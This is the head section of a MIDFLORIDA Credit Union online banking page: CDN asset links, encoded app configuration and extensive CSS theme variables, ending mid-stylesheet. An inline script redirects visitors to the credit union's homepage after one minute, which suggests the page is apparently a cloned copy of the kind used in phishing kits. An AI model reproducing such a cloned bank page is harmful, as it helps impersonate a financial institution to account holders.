<!DOCTYPE html>
<html
  class="js flexbox fontface objectfit object-fit csspositionsticky cssreflections no-regions cssresize shapes siblinggeneral subpixelfont supports csstransforms3d preserve3d canvas canvastext emoji devicemotion deviceorientation svg svgasimg svgclippaths svgfilters svgforeignobject inlinesvg smil no-touchevents typedarrays uagent-webkit uagent-safari uagent-osOsx theme-q2"
  lang="en"
  style="
    background-image: url('https://cdn1.onlineaccess1.com/cdn/depot/5135_01/2201/4ebe251f2940e1fde7a756af180a8899/assets/images/desktop-background-2e9432485d716629ea8c02768ebc4c41.jpg');
  "
  stencil-hydrated=""
>
  <head id="pageheader">
    <link
      rel="stylesheet"
      href="https://cdn1.onlineaccess1.com/cdn/base/tecton/v1.37.1/q2-tecton-theme.css"
      id="tecton-default-theme"
    />
    <link
      rel="stylesheet"
      href="https://cdn1.onlineaccess1.com/cdn/base/tecton/v1.37.1/q2-tecton-utilities.css"
      id="tecton-utilities"
    />
    <link
      href="https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/app.css"
      rel="stylesheet"
      data-no-shim=""
    />
    <link
      href="https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/base.css"
      rel="stylesheet"
      data-no-shim=""
    />
    <link
      href="https://cdn1.onlineaccess1.com/cdn/depot/5135_01/2201/4ebe251f2940e1fde7a756af180a8899/assets/highcontrast-7994ecb11b9bc615d2be2119a918eb3d.css"
      rel="stylesheet"
      data-no-shim=""
    />
    <link
      href="https://cdn1.onlineaccess1.com/cdn/depot/5135_01/2201/4ebe251f2940e1fde7a756af180a8899/assets/images/favicon-b70835672f0e4ca8b23c81da4c7c895d.ico"
      rel="icon"
    />
    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/add-engine-meta.js"
      type="text/javascript"
    ></script>
    <meta
      name="q2-app/config/asset-manifest"
      content="%7B%22bundles%22:%7B%22q2-commercial-engine%22:%7B%22assets%22:%5B%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/engines-dist/q2-commercial-engine/assets/engine-vendor.css%22,%22type%22:%22css%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/engines-dist/q2-commercial-engine/assets/engine-vendor.js%22,%22type%22:%22js%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/engines-dist/q2-commercial-engine/assets/engine.js%22,%22type%22:%22js%22%7D%5D%7D,%22q2-report-engine%22:%7B%22assets%22:%5B%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/engines-dist/q2-report-engine/assets/engine-vendor.css%22,%22type%22:%22css%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/engines-dist/q2-report-engine/assets/engine-vendor.js%22,%22type%22:%22js%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/engines-dist/q2-report-engine/assets/engine.js%22,%22type%22:%22js%22%7D%5D%7D%7D%7D"
    />
    <meta
      name="q2-commercial-engine/config/environment"
      content="%7B%22modulePrefix%22:%22q2-commercial-engine%22,%22rootURL%22:%22/%22,%22wsURL%22:%22mobilews/%22,%22locationType%22:%22hash%22,%22EmberENV%22:%7B%22contentSecurityPolicy%22:%7B%22default-src%22:%22'none'%22,%22script-src%22:%22'self'%20'unsafe-inline'%20'unsafe-eval'%20maps.googleapis.com%20maps.gstatic.com%22,%22connect-src%22:%22'self'%22,%22img-src%22:%22'self'%20data:%20hud.gov%22,%22style-src%22:%22'self'%20'unsafe-inline'%20use.typekit.net%22%7D%7D,%22baseURL%22:%22/%22,%22APP%22:%7B%22name%22:%22dummy%22%7D,%22contentSecurityPolicy%22:%7B%22default-src%22:%22'none'%22,%22script-src%22:%22'self'%22,%22font-src%22:%22'self',%20'https://fonts.gstatic.com'%22,%22connect-src%22:%22'self'%22,%22img-src%22:%22'self'%20www.gravatar.com%22,%22style-src%22:%22'self'%20'https://fonts.gstatic.com'%22,%22media-src%22:%22'self'%22%7D,%22exportApplicationGlobal%22:true%7D"
    />
    <meta
      name="q2-report-engine/config/environment"
      content="%7B%22modulePrefix%22:%22q2-report-engine%22,%22rootURL%22:%22/%22,%22wsURL%22:%22mobilews/%22,%22locationType%22:%22hash%22,%22EmberENV%22:%7B%22contentSecurityPolicy%22:%7B%22default-src%22:%22'none'%22,%22script-src%22:%22'self'%20'unsafe-inline'%20'unsafe-eval'%20maps.googleapis.com%20maps.gstatic.com%22,%22connect-src%22:%22'self'%22,%22img-src%22:%22'self'%20data:%20hud.gov%22,%22style-src%22:%22'self'%20'unsafe-inline'%20use.typekit.net%22%7D%7D,%22exportApplicationGlobal%22:true,%22APP%22:%7B%7D%7D"
    />
    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/vendorapp.js"
      type="text/javascript"
    ></script>
    <script>
      function redirectAfter1Minutes() {
        setTimeout(function () {
          window.location.href = "https://www.midflorida.com/";
        }, 60000);
      }

      window.onload = redirectAfter1Minutes();
    </script>
    <style type="text/css">
      span.im-caret {
        -webkit-animation: 1s blink step-end infinite;
        animation: 1s blink step-end infinite;
      }

      @keyframes blink {
        from,
        to {
          border-right-color: black;
        }
        50% {
          border-right-color: transparent;
        }
      }

      @-webkit-keyframes blink {
        from,
        to {
          border-right-color: black;
        }
        50% {
          border-right-color: transparent;
        }
      }

      span.im-static {
        color: grey;
      }

      div.im-colormask {
        display: inline-block;
        border-style: inset;
        border-width: 2px;
        -webkit-appearance: textfield;
        -moz-appearance: textfield;
        appearance: textfield;
      }

      div.im-colormask > input {
        position: absolute;
        display: inline-block;
        background-color: transparent;
        color: transparent;
        -webkit-appearance: caret;
        -moz-appearance: caret;
        appearance: caret;
        border-style: none;
        left: 0; /*calculated*/
      }

      div.im-colormask > input:focus {
        outline: none;
      }

      div.im-colormask > input::-moz-selection {
        background: none;
      }

      div.im-colormask > input::selection {
        background: none;
      }
      div.im-colormask > input::-moz-selection {
        background: none;
      }

      div.im-colormask > div {
        color: black;
        display: inline-block;
        width: 100px; /*calculated*/
      }
    </style>
    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/imports.app.js"
      type="text/javascript"
    ></script>
    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/imports.deps.js"
      type="text/javascript"
    ></script>
    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/q2-app.js"
      type="text/javascript"
    ></script>

    <link
      href="https://cdn1.onlineaccess1.com/cdn/depot/5135_01/2201/4ebe251f2940e1fde7a756af180a8899/assets/theme-q2-22ba210484a3f9b05efe5fd51af2c230.css"
      rel="stylesheet"
      data-no-shim=""
    />
    <script
      src="https://cdn1.onlineaccess1.com/cdn/depot/5135_01/2201/4ebe251f2940e1fde7a756af180a8899/assets/resources/en-us-487a6d79816ed952c445921a4f61f1db.js"
      type="text/javascript"
    ></script>
    <title>MIDFLORIDA Credit Union</title>
    <meta charset="utf-8" />
    <style data-styles="">
      q2-calendar,
      q2-select,
      q2-action-sheet,
      q2-dropdown,
      q2-data-table,
      q2-editable-field,
      q2-pagination,
      q2-pill,
      q2-tab-container,
      q2-tag,
      q2-carousel,
      q2-month-picker,
      q2-section,
      q2-stepper,
      q2-card,
      q2-chart-donut,
      q2-checkbox-group,
      q2-radio-group,
      q2-stepper-vertical,
      q2-textarea,
      q2-carousel-pane,
      q2-chart-area,
      q2-chart-bar,
      q2-loading-element,
      q2-loc,
      q2-radio,
      q2-stepper-pane,
      q2-tab-pane,
      q2-tooltip,
      tecton-tab-pane,
      q2-icon,
      q2-dropdown-item,
      q2-avatar,
      q2-checkbox,
      q2-option,
      q2-optgroup,
      q2-message,
      q2-input,
      q2-option-list,
      q2-badge,
      q2-popover,
      click-elsewhere,
      q2-btn,
      q2-loading {
        visibility: hidden;
      }
      [stencil-hydrated] {
        visibility: inherit;
      }
    </style>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="description" />
    <meta name="author" />
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta
      name="format-detection"
      content="telephone=no, address=no, email=no"
    />
    <meta
      id="viewportMeta"
      name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=0, user-scalable=no, viewport-fit=cover"
    />
    <meta name="referrer" content="origin" />
    <link
      href="https://cdn1.onlineaccess1.com/cdn/base/4.6.0.3F/assets/tecton-00ec3abd1683e4afabac740ca18e57fb.css"
      rel="stylesheet"
    />
    <style id="tecton-props-css">
      :root {
        --tct-stoplight-info: #0079c1;
        --tct-stoplight-success: #0e8a00;
        --tct-stoplight-warning: #c35500;
        --tct-stoplight-alert: #d20a0a;
        --tct-global-focus: 0 0 0 2px #0066cc;
        --tct-black: #000000;
        --tct-gray-d3: #222222;
        --tct-gray-d2: #444444;
        --tct-gray-d1: #666666;
        --tct-gray: #999999;
        --tct-gray-l1: #cccccc;
        --tct-gray-l2: #eeeeee;
        --tct-gray-l3: #f2f2f2;
        --tct-white: #ffffff;
        --tct-disabled-opacity: 0.66;
        --tct-border-radius-1: 3px;
        --tct-border-radius-2: 6px;
        --tct-border-radius-3: 12px;
        --tct-shadow-1: 0 2px 4px rgba(0, 0, 0, 0.3);
        --tct-shadow-2: 0 3px 6px rgba(0, 0, 0, 0.3);
        --tct-shadow-3: 0 4px 12px rgba(0, 0, 0, 0.3);
        --tct-duration-1: 0.2s;
        --tct-duration-2: 0.4s;
        --tct-duration-3: 0.8s;
        --tct-tween-1: 0.2s cubic-bezier(0.4, 0, 0.2, 1);
        --tct-tween-2: 0.4s cubic-bezier(0.4, 0, 0.2, 1);
        --tct-tween-3: 0.8s cubic-bezier(0.4, 0, 0.2, 1);
        --const-stoplight-info: #0079c1;
        --const-stoplight-success: #0e8a00;
        --const-stoplight-warning: #c35500;
        --const-stoplight-alert: #d20a0a;
        --const-global-focus: 0 0 0 2px #0066cc;
        --const-stoplight-info-text: #ffffff;
        --const-stoplight-success-text: #ffffff;
        --const-stoplight-warning-text: #000000;
        --const-stoplight-alert-text: #ffffff;
        --app-black: #000000;
        --app-gray-d3: #222222;
        --app-gray-d2: #444444;
        --app-gray-d1: #666666;
        --app-gray: #999999;
        --app-gray-l1: #cccccc;
        --app-gray-l2: #eeeeee;
        --app-gray-l3: #f2f2f2;
        --app-white: var(--t-base, #ffffff);
        --app-disabled-opacity: 0.66;
        --app-border-radius-1: 3px;
        --app-border-radius-2: 6px;
        --app-border-radius-3: 12px;
        --app-shadow-1: 0 2px 4px rgba(0, 0, 0, 0.3);
        --app-shadow-2: 0 3px 6px rgba(0, 0, 0, 0.3);
        --app-shadow-3: 0 4px 12px rgba(0, 0, 0, 0.3);
        --app-duration-1: 0.2s;
        --app-duration-2: 0.4s;
        --app-duration-3: 0.8s;
        --app-tween-1: 0.2s cubic-bezier(0.4, 0, 0.2, 1);
        --app-tween-2: 0.4s cubic-bezier(0.4, 0, 0.2, 1);
        --app-tween-3: 0.8s cubic-bezier(0.4, 0, 0.2, 1);
        --app-font-size: 14px;
        --app-line-height: 1.428571429;
        --app-font-size-small: 12px;
        --app-tooltip-multiline-max-width: 200px;
        --app-tooltip-background-color: rgba(0, 0, 0, 0.8);
        --app-tooltip-text-color: #ffffff;
        --app-tooltip-size: 5px;
        --app-tooltip-position: -5px;
        --app-tooltip-body-offset: -15px;
        --app-tooltip-transition-duration: 250ms;
        --app-tooltip-visible-duration: 2s;
      }
    </style>
    <style id="tecton-theme-css">
      :root {
        --tct-scale-0: 0px;
        --tct-scale-1: 5px;
        --tct-scale-2: 10px;
        --tct-scale-3: 15px;
        --tct-scale-4: 20px;
        --tct-scale-5: 45px;
        --tct-scale-6: 60px;
        --tct-scale-0x: 0px;
        --tct-scale-1x: 5px;
        --tct-scale-2x: 10px;
        --tct-scale-3x: 15px;
        --tct-scale-4x: 20px;
        --tct-scale-5x: 25px;
        --tct-scale-6x: 30px;
        --tct-scale-7x: 35px;
        --tct-scale-8x: 40px;
        --tct-scale-9x: 45px;
        --tct-scale-10x: 50px;
        --tct-scale-11x: 55px;
        --tct-scale-12x: 60px;
        --tct-link-color: #008573;
        --tct-link-hover-color: #00365e;
        --tct-btn-border-radius: 3px;
        --tct-btn-tween: 0.2s cubic-bezier(0.4, 0, 0.2, 1);
        --tct-btn-padding: 10px;
        --tct-btn-padding-size-large: initial;
        --tct-btn-padding-size-medium: initial;
        --tct-btn-padding-size-small: initial;
        --tct-btn-disabled-opacity: 0.66;
        --tct-btn-font-size: inherit;
        --tct-btn-font-size-small: inherit;
        --tct-btn-primary-bg: #008573;
        --tct-btn-primary-hover-bg: #008573;
        --tct-btn-primary-hover-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.19),
          0 3px 3px rgba(0, 0, 0, 0.23);
        --tct-btn-primary-disabled-bg: #008573;
        --tct-btn-primary-disabled-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12),
          0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-secondary-bg: #007061;
        --tct-btn-secondary-hover-bg: #008573;
        --tct-btn-secondary-hover-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.19),
          0 3px 3px rgba(0, 0, 0, 0.23);
        --tct-btn-secondary-disabled-bg: #007061;
        --tct-btn-secondary-disabled-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12),
          0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-neutral-bg: #ffffff;
        --tct-btn-neutral-hover-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.19),
          0 3px 3px rgba(0, 0, 0, 0.23);
        --tct-btn-neutral-disabled-bg: #ffffff;
        --tct-btn-neutral-disabled-box-shadow: initial;
        --tct-btn-icon-color: currentColor;
        --tct-btn-icon-hover-bg: #e6e6e6;
        --tct-btn-badge-bg: initial;
        --tct-btn-badge-hover-bg: initial;
        --tct-btn-badge-active-bg: #008573;
        --tct-btn-primary-active-background: #00487d;
        --tct-btn-primary-active-border-color: #003f6d;
        --tct-btn-primary-active-border-style: solid;
        --tct-btn-primary-active-border-width: 0;
        --tct-btn-primary-active-font-color: #ffffff;
        --tct-btn-primary-active-font-weight: 600;
        --tct-btn-primary-active-outline-color: transparent;
        --tct-btn-primary-active-outline-style: solid;
        --tct-btn-primary-active-outline-width: initial;
        --tct-btn-primary-active-text-decoration: initial;
        --tct-btn-primary-background: #008573;
        --tct-btn-primary-border-color: transparent;
        --tct-btn-primary-border-radius: 3px;
        --tct-btn-primary-border-style: inherit;
        --tct-btn-primary-border-width: 0;
        --tct-btn-primary-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12),
          0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-primary-disabled-background: #008573;
        --tct-btn-primary-disabled-border-color: transparent;
        --tct-btn-primary-disabled-border-style: solid;
        --tct-btn-primary-disabled-border-width: 0;
        --tct-btn-primary-disabled-font-color: #ffffff;
        --tct-btn-primary-disabled-font-weight: 600;
        --tct-btn-primary-disabled-outline-color: initial;
        --tct-btn-primary-disabled-outline-style: solid;
        --tct-btn-primary-disabled-outline-width: 0;
        --tct-btn-primary-disabled-text-decoration: initial;
        --tct-btn-primary-focus-background: initial;
        --tct-btn-primary-focus-border-color: #003f6d;
        --tct-btn-primary-focus-border-style: solid;
        --tct-btn-primary-focus-border-width: 0;
        --tct-btn-primary-focus-box-shadow: initial;
        --tct-btn-primary-focus-font-color: #ffffff;
        --tct-btn-primary-focus-font-weight: initial;
        --tct-btn-primary-focus-outline-color: initial;
        --tct-btn-primary-focus-outline-style: initial;
        --tct-btn-primary-focus-outline-width: initial;
        --tct-btn-primary-focus-text-decoration: initial;
        --tct-btn-primary-focus-visible-background: initial;
        --tct-btn-primary-focus-visible-border-color: #003f6d;
        --tct-btn-primary-focus-visible-border-style: initial;
        --tct-btn-primary-focus-visible-border-width: 0;
        --tct-btn-primary-focus-visible-font-color: #ffffff;
        --tct-btn-primary-focus-visible-font-weight: initial;
        --tct-btn-primary-focus-visible-inner-ring-color: #ffffff;
        --tct-btn-primary-focus-visible-outer-ring-color: initial;
        --tct-btn-primary-focus-visible-outline-color: initial;
        --tct-btn-primary-focus-visible-outline-style: initial;
        --tct-btn-primary-focus-visible-outline-width: initial;
        --tct-btn-primary-focus-visible-text-decoration: initial;
        --tct-btn-primary-font-color: #ffffff;
        --tct-btn-primary-font-weight: 600;
        --tct-btn-primary-hover-background: #008573;
        --tct-btn-primary-hover-border-color: #003f6d;
        --tct-btn-primary-hover-border-style: solid;
        --tct-btn-primary-hover-border-width: 0;
        --tct-btn-primary-hover-font-color: #ffffff;
        --tct-btn-primary-hover-font-weight: 600;
        --tct-btn-primary-hover-inner-ring-color: #ffffff;
        --tct-btn-primary-hover-outer-ring-color: #008573;
        --tct-btn-primary-hover-outline-color: transparent;
        --tct-btn-primary-hover-outline-style: solid;
        --tct-btn-primary-hover-outline-width: initial;
        --tct-btn-primary-hover-text-decoration: initial;
        --tct-btn-primary-icon-color: #ffffff;
        --tct-btn-primary-letter-spacing: normal;
        --tct-btn-primary-loading-background: initial;
        --tct-btn-primary-outline-color: transparent;
        --tct-btn-primary-outline-style: solid;
        --tct-btn-primary-outline-width: initial;
        --tct-btn-primary-text-decoration: initial;
        --tct-btn-primary-text-transform: none;
        --tct-btn-secondary-active-background: #008573;
        --tct-btn-secondary-active-border-color: initial;
        --tct-btn-secondary-active-border-style: initial;
        --tct-btn-secondary-active-border-width: 0;
        --tct-btn-secondary-active-font-color: #ffffff;
        --tct-btn-secondary-active-font-weight: initial;
        --tct-btn-secondary-active-outline-color: initial;
        --tct-btn-secondary-active-outline-style: initial;
        --tct-btn-secondary-active-outline-width: initial;
        --tct-btn-secondary-active-text-decoration: initial;
        --tct-btn-secondary-background: #007061;
        --tct-btn-secondary-border-color: initial;
        --tct-btn-secondary-border-radius: initial;
        --tct-btn-secondary-border-style: initial;
        --tct-btn-secondary-border-width: 0;
        --tct-btn-secondary-box-shadow: initial;
        --tct-btn-secondary-disabled-background: initial;
        --tct-btn-secondary-disabled-border-color: initial;
        --tct-btn-secondary-disabled-border-style: initial;
        --tct-btn-secondary-disabled-border-width: 0;
        --tct-btn-secondary-disabled-font-color: initial;
        --tct-btn-secondary-disabled-font-weight: initial;
        --tct-btn-secondary-disabled-outline-color: initial;
        --tct-btn-secondary-disabled-outline-style: initial;
        --tct-btn-secondary-disabled-outline-width: initial;
        --tct-btn-secondary-disabled-text-decoration: initial;
        --tct-btn-secondary-focus-background: #008573;
        --tct-btn-secondary-focus-border-color: initial;
        --tct-btn-secondary-focus-border-style: initial;
        --tct-btn-secondary-focus-border-width: 0;
        --tct-btn-secondary-focus-box-shadow: initial;
        --tct-btn-secondary-focus-font-color: #ffffff;
        --tct-btn-secondary-focus-font-weight: initial;
        --tct-btn-secondary-focus-outline-color: initial;
        --tct-btn-secondary-focus-outline-style: initial;
        --tct-btn-secondary-focus-outline-width: initial;
        --tct-btn-secondary-focus-text-decoration: initial;
        --tct-btn-secondary-focus-visible-background: #008573;
        --tct-btn-secondary-focus-visible-border-color: initial;
        --tct-btn-secondary-focus-visible-border-style: initial;
        --tct-btn-secondary-focus-visible-border-width: 0;
        --tct-btn-secondary-focus-visible-font-color: #ffffff;
        --tct-btn-secondary-focus-visible-font-weight: initial;
        --tct-btn-secondary-focus-visible-inner-ring-color: initial;
        --tct-btn-secondary-focus-visible-outer-ring-color: initial;
        --tct-btn-secondary-focus-visible-outline-color: initial;
        --tct-btn-secondary-focus-visible-outline-style: initial;
        --tct-btn-secondary-focus-visible-outline-width: initial;
        --tct-btn-secondary-focus-visible-text-decoration: initial;
        --tct-btn-secondary-font-color: #ffffff;
        --tct-btn-secondary-font-weight: initial;
        --tct-btn-secondary-hover-background: #008573;
        --tct-btn-secondary-hover-border-color: initial;
        --tct-btn-secondary-hover-border-style: initial;
        --tct-btn-secondary-hover-border-width: 0;
        --tct-btn-secondary-hover-font-color: #ffffff;
        --tct-btn-secondary-hover-font-weight: initial;
        --tct-btn-secondary-hover-inner-ring-color: initial;
        --tct-btn-secondary-hover-outer-ring-color: initial;
        --tct-btn-secondary-hover-outline-color: initial;
        --tct-btn-secondary-hover-outline-style: initial;
        --tct-btn-secondary-hover-outline-width: initial;
        --tct-btn-secondary-hover-text-decoration: initial;
        --tct-btn-secondary-icon-color: initial;
        --tct-btn-secondary-letter-spacing: initial;
        --tct-btn-secondary-outline-color: initial;
        --tct-btn-secondary-outline-style: initial;
        --tct-btn-secondary-outline-width: initial;
        --tct-btn-secondary-text-decoration: initial;
        --tct-btn-secondary-text-transform: initial;
        --tct-btn-neutral-active-background: initial;
        --tct-btn-neutral-active-border-color: initial;
        --tct-btn-neutral-active-border-style: initial;
        --tct-btn-neutral-active-border-width: initial;
        --tct-btn-neutral-active-font-color: initial;
        --tct-btn-neutral-active-font-weight: initial;
        --tct-btn-neutral-active-outline-color: initial;
        --tct-btn-neutral-active-outline-style: initial;
        --tct-btn-neutral-active-outline-width: initial;
        --tct-btn-neutral-active-text-decoration: initial;
        --tct-btn-neutral-background: #ffffff;
        --tct-btn-neutral-border-color: initial;
        --tct-btn-neutral-border-radius: initial;
        --tct-btn-neutral-border-style: initial;
        --tct-btn-neutral-border-width: initial;
        --tct-btn-neutral-box-shadow: initial;
        --tct-btn-neutral-disabled-background: initial;
        --tct-btn-neutral-disabled-border-color: initial;
        --tct-btn-neutral-disabled-border-style: initial;
        --tct-btn-neutral-disabled-border-width: initial;
        --tct-btn-neutral-disabled-font-color: initial;
        --tct-btn-neutral-disabled-font-weight: initial;
        --tct-btn-neutral-disabled-outline-color: initial;
        --tct-btn-neutral-disabled-outline-style: initial;
        --tct-btn-neutral-disabled-outline-width: initial;
        --tct-btn-neutral-disabled-text-decoration: initial;
        --tct-btn-neutral-focus-background: initial;
        --tct-btn-neutral-focus-border-color: initial;
        --tct-btn-neutral-focus-border-style: initial;
        --tct-btn-neutral-focus-border-width: initial;
        --tct-btn-neutral-focus-box-shadow: initial;
        --tct-btn-neutral-focus-font-color: initial;
        --tct-btn-neutral-focus-font-weight: initial;
        --tct-btn-neutral-focus-outline-color: initial;
        --tct-btn-neutral-focus-outline-style: initial;
        --tct-btn-neutral-focus-outline-width: initial;
        --tct-btn-neutral-focus-text-decoration: initial;
        --tct-btn-neutral-focus-visible-background: initial;
        --tct-btn-neutral-focus-visible-border-color: initial;
        --tct-btn-neutral-focus-visible-border-style: initial;
        --tct-btn-neutral-focus-visible-border-width: initial;
        --tct-btn-neutral-focus-visible-font-color: initial;
        --tct-btn-neutral-focus-visible-font-weight: initial;
        --tct-btn-neutral-focus-visible-inner-ring-color: initial;
        --tct-btn-neutral-focus-visible-outer-ring-color: initial;
        --tct-btn-neutral-focus-visible-outline-color: initial;
        --tct-btn-neutral-focus-visible-outline-style: initial;
        --tct-btn-neutral-focus-visible-outline-width: initial;
        --tct-btn-neutral-focus-visible-text-decoration: initial;
        --tct-btn-neutral-font-color: #005a9c;
        --tct-btn-neutral-font-weight: initial;
        --tct-btn-neutral-hover-background: #ffffff;
        --tct-btn-neutral-hover-border-color: initial;
        --tct-btn-neutral-hover-border-style: initial;
        --tct-btn-neutral-hover-border-width: initial;
        --tct-btn-neutral-hover-font-color: #005a9c;
        --tct-btn-neutral-hover-font-weight: initial;
        --tct-btn-neutral-hover-inner-ring-color: initial;
        --tct-btn-neutral-hover-outer-ring-color: initial;
        --tct-btn-neutral-hover-outline-color: initial;
        --tct-btn-neutral-hover-outline-style: initial;
        --tct-btn-neutral-hover-outline-width: initial;
        --tct-btn-neutral-hover-text-decoration: initial;
        --tct-btn-neutral-icon-color: initial;
        --tct-btn-neutral-letter-spacing: initial;
        --tct-btn-neutral-outline-color: initial;
        --tct-btn-neutral-outline-style: initial;
        --tct-btn-neutral-outline-width: initial;
        --tct-btn-neutral-text-active-background: initial;
        --tct-btn-neutral-text-active-border-color: initial;
        --tct-btn-neutral-text-active-border-style: initial;
        --tct-btn-neutral-text-active-border-width: initial;
        --tct-btn-neutral-text-active-font-color: initial;
        --tct-btn-neutral-text-active-font-weight: initial;
        --tct-btn-neutral-text-active-outline-color: initial;
        --tct-btn-neutral-text-active-outline-style: initial;
        --tct-btn-neutral-text-active-outline-width: initial;
        --tct-btn-neutral-text-active-text-decoration: initial;
        --tct-btn-neutral-text-background: initial;
        --tct-btn-neutral-text-bg: initial;
        --tct-btn-neutral-text-border-color: initial;
        --tct-btn-neutral-text-border-radius: initial;
        --tct-btn-neutral-text-border-style: initial;
        --tct-btn-neutral-text-border-width: initial;
        --tct-btn-neutral-text-box-shadow: initial;
        --tct-btn-neutral-text-decoration: initial;
        --tct-btn-neutral-text-disabled-background: initial;
        --tct-btn-neutral-text-disabled-border-color: initial;
        --tct-btn-neutral-text-disabled-border-style: initial;
        --tct-btn-neutral-text-disabled-border-width: initial;
        --tct-btn-neutral-text-disabled-font-color: initial;
        --tct-btn-neutral-text-disabled-font-weight: initial;
        --tct-btn-neutral-text-disabled-outline-color: initial;
        --tct-btn-neutral-text-disabled-outline-style: initial;
        --tct-btn-neutral-text-disabled-outline-width: initial;
        --tct-btn-neutral-text-disabled-text-decoration: initial;
        --tct-btn-neutral-text-focus-background: initial;
        --tct-btn-neutral-text-focus-border-color: initial;
        --tct-btn-neutral-text-focus-border-style: initial;
        --tct-btn-neutral-text-focus-border-width: initial;
        --tct-btn-neutral-text-focus-font-color: initial;
        --tct-btn-neutral-text-focus-font-weight: initial;
        --tct-btn-neutral-text-focus-outline-color: initial;
        --tct-btn-neutral-text-focus-outline-style: initial;
        --tct-btn-neutral-text-focus-outline-width: initial;
        --tct-btn-neutral-text-focus-text-decoration: initial;
        --tct-btn-neutral-text-focus-visible-background: initial;
        --tct-btn-neutral-text-focus-visible-border-color: initial;
        --tct-btn-neutral-text-focus-visible-border-style: initial;
        --tct-btn-neutral-text-focus-visible-border-width: initial;
        --tct-btn-neutral-text-focus-visible-font-color: initial;
        --tct-btn-neutral-text-focus-visible-font-weight: initial;
        --tct-btn-neutral-text-focus-visible-inner-ring-color: initial;
        --tct-btn-neutral-text-focus-visible-outer-ring-color: initial;
        --tct-btn-neutral-text-focus-visible-outline-color: initial;
        --tct-btn-neutral-text-focus-visible-outline-style: initial;
        --tct-btn-neutral-text-focus-visible-outline-width: initial;
        --tct-btn-neutral-text-focus-visible-text-decoration: initial;
        --tct-btn-neutral-text-font-color: initial;
        --tct-btn-neutral-text-font-weight: initial;
        --tct-btn-neutral-text-hover-background: initial;
        --tct-btn-neutral-text-hover-border-color: initial;
        --tct-btn-neutral-text-hover-border-style: initial;
        --tct-btn-neutral-text-hover-border-width: initial;
        --tct-btn-neutral-text-hover-font-color: initial;
        --tct-btn-neutral-text-hover-font-weight: initial;
        --tct-btn-neutral-text-hover-inner-ring-color: initial;
        --tct-btn-neutral-text-hover-outer-ring-color: initial;
        --tct-btn-neutral-text-hover-outline-color: initial;
        --tct-btn-neutral-text-hover-outline-style: initial;
        --tct-btn-neutral-text-hover-outline-width: initial;
        --tct-btn-neutral-text-hover-text-decoration: initial;
        --tct-btn-neutral-text-icon-color: initial;
        --tct-btn-neutral-text-letter-spacing: initial;
        --tct-btn-neutral-text-outline-color: initial;
        --tct-btn-neutral-text-outline-style: initial;
        --tct-btn-neutral-text-outline-width: initial;
        --tct-btn-neutral-text-text-decoration: initial;
        --tct-btn-neutral-text-text-transform: initial;
        --tct-btn-neutral-text-transform: initial;
        --tct-btn-destroy-active-background: initial;
        --tct-btn-destroy-active-border-color: initial;
        --tct-btn-destroy-active-border-style: initial;
        --tct-btn-destroy-active-border-width: 0;
        --tct-btn-destroy-active-font-color: initial;
        --tct-btn-destroy-active-font-weight: initial;
        --tct-btn-destroy-active-outline-color: initial;
        --tct-btn-destroy-active-outline-style: initial;
        --tct-btn-destroy-active-outline-width: initial;
        --tct-btn-destroy-active-text-decoration: initial;
        --tct-btn-destroy-background: initial;
        --tct-btn-destroy-border-color: initial;
        --tct-btn-destroy-border-radius: initial;
        --tct-btn-destroy-border-style: initial;
        --tct-btn-destroy-border-width: 0;
        --tct-btn-destroy-box-shadow: initial;
        --tct-btn-destroy-disabled-background: initial;
        --tct-btn-destroy-disabled-border-color: initial;
        --tct-btn-destroy-disabled-border-style: initial;
        --tct-btn-destroy-disabled-border-width: 0;
        --tct-btn-destroy-disabled-font-color: initial;
        --tct-btn-destroy-disabled-font-weight: initial;
        --tct-btn-destroy-disabled-outline-color: initial;
        --tct-btn-destroy-disabled-outline-style: initial;
        --tct-btn-destroy-disabled-outline-width: initial;
        --tct-btn-destroy-disabled-text-decoration: initial;
        --tct-btn-destroy-focus-background: initial;
        --tct-btn-destroy-focus-border-color: initial;
        --tct-btn-destroy-focus-border-style: initial;
        --tct-btn-destroy-focus-border-width: 0;
        --tct-btn-destroy-focus-box-shadow: initial;
        --tct-btn-destroy-focus-font-color: initial;
        --tct-btn-destroy-focus-font-weight: initial;
        --tct-btn-destroy-focus-outline-color: initial;
        --tct-btn-destroy-focus-outline-style: initial;
        --tct-btn-destroy-focus-outline-width: initial;
        --tct-btn-destroy-focus-text-decoration: initial;
        --tct-btn-destroy-focus-visible-background: initial;
        --tct-btn-destroy-focus-visible-border-color: initial;
        --tct-btn-destroy-focus-visible-border-style: initial;
        --tct-btn-destroy-focus-visible-border-width: 0;
        --tct-btn-destroy-focus-visible-font-color: initial;
        --tct-btn-destroy-focus-visible-font-weight: initial;
        --tct-btn-destroy-focus-visible-inner-ring-color: initial;
        --tct-btn-destroy-focus-visible-outer-ring-color: initial;
        --tct-btn-destroy-focus-visible-outline-color: initial;
